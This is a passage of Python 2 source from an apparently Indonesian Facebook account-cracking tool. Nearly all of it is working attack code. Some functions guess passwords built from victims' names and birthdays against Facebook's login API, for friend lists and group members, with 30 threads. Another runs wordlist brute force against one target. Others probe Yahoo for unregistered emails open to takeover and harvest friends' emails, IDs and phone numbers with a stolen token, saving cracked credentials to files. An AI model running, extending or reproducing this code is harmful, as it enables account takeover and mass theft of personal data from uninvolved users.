zedd.join()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Koneksi terganggu'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
def hasil():
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Gagal \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Crack dari daftar Teman'
print '\x1b[1;37;40m2. Crack dari member Grup'
print '\x1b[1;31;40m0. Kembali'
print
pilih_super()
def pilih_super():
peak = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mJumlah\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mMencoba \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mIngin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Dari teman facebook'
print '\x1b[1;37;40m2. Gunakan File'
print '\x1b[1;31;40m0. Kembali'
print
yahoo_pilih()
def yahoo_pilih():
go = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Jangan kosong'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak ada'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(teman.text)
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Ambil ID teman'
print '\x1b[1;37;40m2. Ambil ID teman dari teman'
print '\x1b[1;37;40m3. Ambil ID member GRUP'
print '\x1b[1;37;40m4. Ambil Email teman'
print '\x1b[1;37;40m5. Ambil Email teman dari teman'
print '\x1b[1;37;40m6. Ambil No HP teman'
print '\x1b[1;37;40m7. Ambil No HP teman dari teman'
print '\x1b[1;31;40m0. Kembali'
print
grab_pilih()
def grab_pilih():
cuih = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Jangan kosong'
grab_pilih()
else:
if cuih == '1':
id_teman()
else:
if cuih == '2':
idfrom_teman()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_teman()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_teman()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mTidak ada'
grab_pilih()
def id_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def idfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def emailfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(emfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
